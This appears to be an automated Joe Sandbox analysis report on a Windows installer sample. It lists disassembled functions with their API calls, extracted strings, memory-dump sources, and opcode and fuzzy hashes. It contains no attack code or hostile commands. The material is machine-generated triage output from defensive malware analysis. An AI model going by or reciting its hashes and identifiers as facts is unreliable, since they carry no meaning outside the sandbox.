                                                    • Opcode Fuzzy Hash: 463de8541502243dd76fe68c1a4a8b5d0bfbc04b57ffc60a5f26a99c82f0656f
                                                    • Instruction Fuzzy Hash: BFE1E271A006069FDB12DF68DC48B6FBBB9FF45310F158628E911EB295EB34D900CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003884B0 Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 843windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003884FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$Lt[$SpawnDialog$Title$`Dialog_`='
                                                    • API String ID: 3850602802-3629213097
                                                    • Opcode ID: 3d8039334a75835f3164f2529f3883793e7b2d2e12b8987a33e5aef5f6746597
                                                    • Instruction ID: 2a93b5c7558982aefaf0281c1889a25e6f8d58abac347a49bc4a3458e0874588
                                                    • Opcode Fuzzy Hash: 3d8039334a75835f3164f2529f3883793e7b2d2e12b8987a33e5aef5f6746597
                                                    • Instruction Fuzzy Hash: A172D271D00258DFDB15DFA8C844BDDBBB1FF58304F648299E505BB291DB34AA85CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00507900 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 423fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00507B4B
                                                    • CloseHandle.KERNEL32(00000000), ref: 00507B5A
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00507B64
                                                    • CloseHandle.KERNEL32(?), ref: 00507B95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$CreateErrorFileLast
                                                    • String ID: NUMBER_OF_PROCESSORS$TQ]
                                                    • API String ID: 3884794734-4021308933
                                                    • Opcode ID: f424b215f324f5a1ae98291adbda16c2287a8bfa916bd42956c8b3297edd3170
                                                    • Instruction ID: f84159eb72b536ccffd8ece040a57c9419077d56ccff42dd0a621ca857e18e46
                                                    • Opcode Fuzzy Hash: f424b215f324f5a1ae98291adbda16c2287a8bfa916bd42956c8b3297edd3170
                                                    • Instruction Fuzzy Hash: DC127B70D04259DFDF10CFA8D888BAEBFF1BF08314F1481A9E415AB291D775AA49CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044C450 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 367windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0044C6D9
                                                    • SendMessageW.USER32(?,00000443,00000000), ref: 0044C743
                                                    • MulDiv.KERNEL32(?,00000000), ref: 0044C77A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow
                                                    • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                    • API String ID: 701072176-2319862951
                                                    • Opcode ID: 54c819792b94e94b1582a1a47049426f724f091346dd9218b5d108b8931d4250
                                                    • Instruction ID: 9a461ba4fc3ef8a1d4e688d895fedee5f6b917e25c4145fd5d0b11e078c1aedb
                                                    • Opcode Fuzzy Hash: 54c819792b94e94b1582a1a47049426f724f091346dd9218b5d108b8931d4250
                                                    • Instruction Fuzzy Hash: 73D1DF71A00605AFEB14CF74CC85BEEBBB1FF89300F108659E556A72D1DB74AA49CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046C040 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 240fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0046C098
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • FindFirstFileW.KERNEL32(?,00000000,?,?,00000011), ref: 0046C198
                                                    • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000,?,?,00000011), ref: 0046C235
                                                    • FindClose.KERNEL32(00000000,?,00000000,?,?,00000011), ref: 0046C25B
                                                    • FindClose.KERNEL32(00000000,?,00000000,?,?,00000011), ref: 0046C2A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirstInit_thread_footer$HeapProcess_wcsrchr
                                                    • String ID: p2[
                                                    • API String ID: 352340201-3128520015
                                                    • Opcode ID: f9ef12ee2f81084685bfa460e763ec8d74824377ec522742cc66ee3700b4702e
                                                    • Instruction ID: f1785292d09c87c31394ecd80c50c9a3690babe5314f1eb05cccea09df358fe8
                                                    • Opcode Fuzzy Hash: f9ef12ee2f81084685bfa460e763ec8d74824377ec522742cc66ee3700b4702e
                                                    • Instruction Fuzzy Hash: 5A71D271A00209DFDB10DFA8CC98BBBBBF4FF45324F10825AE8559B281E77999048B56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0054328A Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: b9b69c4b55da9c84b7c46a6a30e469ab6252831b69d841d17a398315086a83f6
                                                    • Instruction ID: 10587fd77abd9b9c9399d0195bbc372a16b1b2df625c7a5ed04ec1786fe22266
                                                    • Opcode Fuzzy Hash: b9b69c4b55da9c84b7c46a6a30e469ab6252831b69d841d17a398315086a83f6
                                                    • Instruction Fuzzy Hash: C2D23971E082298FDB25CE28DC447EABBB5FB45309F1445EAD44DE7250EB78AE858F40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B08C0 Relevance: 9.2, APIs: 6, Instructions: 203fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,D13B3340,?,00000000,00000000), ref: 004B0991
                                                    • FindNextFileW.KERNEL32(?,00000000), ref: 004B09AC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileFind$FirstNext
                                                    • String ID:
                                                    • API String ID: 1690352074-0
                                                    • Opcode ID: 1a91939d29f23013f1377293e1c97883e16630ed9f74b4b831460180709d54b0
                                                    • Instruction ID: 2ab1fe8e16d12f292499d4c6729ff5ad2be420a5a74abf2ad87a43a3f3dee4a3
                                                    • Opcode Fuzzy Hash: 1a91939d29f23013f1377293e1c97883e16630ed9f74b4b831460180709d54b0
                                                    • Instruction Fuzzy Hash: EE71AD71901649DFDB10DFA8CC48AEEBBB8FF04315F148269E815AB291DB349E08CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051F9A7 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000C,0051F8C3,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9A9
                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9D0
                                                    • HeapAlloc.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9D7
                                                    • InitializeSListHead.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9E4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9F9
                                                    • HeapFree.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051FA00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                    • String ID:
                                                    • API String ID: 1475849761-0
                                                    • Opcode ID: abdb166fafce4fa8dd92492b206b221487dcb08f011e035a256bfe4c977f8d76
                                                    • Instruction ID: d34697e189e058bfc9b590b4b106062ff065a463c162c1ec47120a9b253e1bfe
                                                    • Opcode Fuzzy Hash: abdb166fafce4fa8dd92492b206b221487dcb08f011e035a256bfe4c977f8d76
                                                    • Instruction Fuzzy Hash: E8F0C8756406019BE7219F38EC0CB2637E9FFA9B12F000438FA46D3250EF74D4449760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00378E20 Relevance: 6.8, Strings: 5, Instructions: 567COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
                                                    • API String ID: 1385522511-2308371840
                                                    • Opcode ID: 304710e828c5ebcd70ab8c75638e4519087432b8f09c652348a41eabbf5d48e2
                                                    • Instruction ID: 61a4e0b1440cd6535c29ec7efc4354386ff4b83e208789fa85aefe8b961c9a0d
                                                    • Opcode Fuzzy Hash: 304710e828c5ebcd70ab8c75638e4519087432b8f09c652348a41eabbf5d48e2
                                                    • Instruction Fuzzy Hash: 4322F370E102499FDF15DFA4CC99BEEBBB1BF45314F248249E005BB291DB786A84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053839A Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: cf26b04feba36ec538749ee1d57a00ae9e5f61497e5783d4f8033c0758c89abe
                                                    • Instruction ID: 223990362811cf5996c04bfa4c968a6a1b4ab27084559098d814538c67c7643c
                                                    • Opcode Fuzzy Hash: cf26b04feba36ec538749ee1d57a00ae9e5f61497e5783d4f8033c0758c89abe
                                                    • Instruction Fuzzy Hash: 94B125329053569FDF198F68C881BFEBFA5FF99304F148169F905AB242DA349D01CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049CDD0 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d04944ae8ad058c89995e809882222d22deb67b099d221bab68c22d5e069fed
                                                    • Instruction ID: 4ef4a7dfd0fa5694a8b28ea55be55eca14f13b367ef52b087d5f4886c3f5493b
                                                    • Opcode Fuzzy Hash: 6d04944ae8ad058c89995e809882222d22deb67b099d221bab68c22d5e069fed
                                                    • Instruction Fuzzy Hash: 48818D719012189FDF50DF68CC89B9ABBB4EF45314F1482E9E818AB292DB749E44CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00374B30 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
                                                    • API String ID: 0-932585912
                                                    • Opcode ID: 231860015196c234428299a3787d3d015506aa9ff7ed35be6a7509fee98bca3e
                                                    • Instruction ID: 015020775375fb71056b95e516fb2db8b12d3207dc567e20daa34a0925813eef
                                                    • Opcode Fuzzy Hash: 231860015196c234428299a3787d3d015506aa9ff7ed35be6a7509fee98bca3e
                                                    • Instruction Fuzzy Hash: C3421571D006188BDB29CF68CC54BADB7B1FF85300F50C25DE459AB392D778AA45CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049D1D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 0049D28C
                                                    • FindClose.KERNEL32(00000000), ref: 0049D3D7
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$AllocateCloseFileFirstHeap
                                                    • String ID: %d.%d.%d.%d
                                                    • API String ID: 1673784098-3491811756
                                                    • Opcode ID: 35dbdb1fd372b1f6536481f32ec04597b8459dd84eac314e04706b29cab32479
                                                    • Instruction ID: 993b20e2da1e19e0c3eda3f31989b924b9df4a284d1cc943c5681f39af20dec2
                                                    • Opcode Fuzzy Hash: 35dbdb1fd372b1f6536481f32ec04597b8459dd84eac314e04706b29cab32479
                                                    • Instruction Fuzzy Hash: E1615C71905219DFDF20DF68C948B9EBBB4EF44314F1082E9E819AB291DB359A84CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003873A0 Relevance: 5.4, Strings: 4, Instructions: 364COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <> "$ = "$Hide$Show
                                                    • API String ID: 0-289022205
                                                    • Opcode ID: cfef0244808c188b203b76e9b101839fd3d0f5cde633d58fd67e62c78bef5cf5
                                                    • Instruction ID: 4e5c51128e3cf1adea5c0bed03afdd5d4bf8a1b66aa1632566b0db5f02fa689c
                                                    • Opcode Fuzzy Hash: cfef0244808c188b203b76e9b101839fd3d0f5cde633d58fd67e62c78bef5cf5
                                                    • Instruction Fuzzy Hash: 14F1AC70D00358CFDB15DF64C855BADBBB1BF55304F2086D9E4097B2A2EB70AA84CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00495A10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • GetLocaleInfoW.KERNEL32(?,00000002,005B329C,00000000), ref: 00495A81
                                                    • GetLocaleInfoW.KERNEL32(?,00000002,00495605,-00000001,00000078,-00000001), ref: 00495ABD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InfoInit_thread_footerLocale$HeapProcess
                                                    • String ID: %d-%s
                                                    • API String ID: 1688948774-1781338863
                                                    • Opcode ID: b31001de813e190a97096aecf183cb3dfa9afa0c7c4f80bf76686c1056e5dc3e
                                                    • Instruction ID: dcc48091a67d3d31c19a026031140654cac9dd6406329105f09d60e152c35bec
                                                    • Opcode Fuzzy Hash: b31001de813e190a97096aecf183cb3dfa9afa0c7c4f80bf76686c1056e5dc3e
                                                    • Instruction Fuzzy Hash: 05319A71A00605AFDB00DF98CC49FAEFBB8FF04715F104269E515AB2D2EB759904CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00357480 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVersionExW.KERNEL32 ref: 005199C8
                                                    • GetVersionExW.KERNEL32(?), ref: 00519A13
                                                    • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00519A27
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Version$FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 1871528217-0
                                                    • Opcode ID: 2850a5d89cd49ca9ec573bd1d3a8d062e663cee9dd5895fb69a48d4554b5505f
                                                    • Instruction ID: 327bd539cd93c1b075b2ae68d5d86719ead38b58198da4d23b3ed57b04b10201
                                                    • Opcode Fuzzy Hash: 2850a5d89cd49ca9ec573bd1d3a8d062e663cee9dd5895fb69a48d4554b5505f
                                                    • Instruction Fuzzy Hash: BE61E872B142244BF708CF2D8C956EABFD6EBC9341F05463EE496C7291DA78C549CBA0
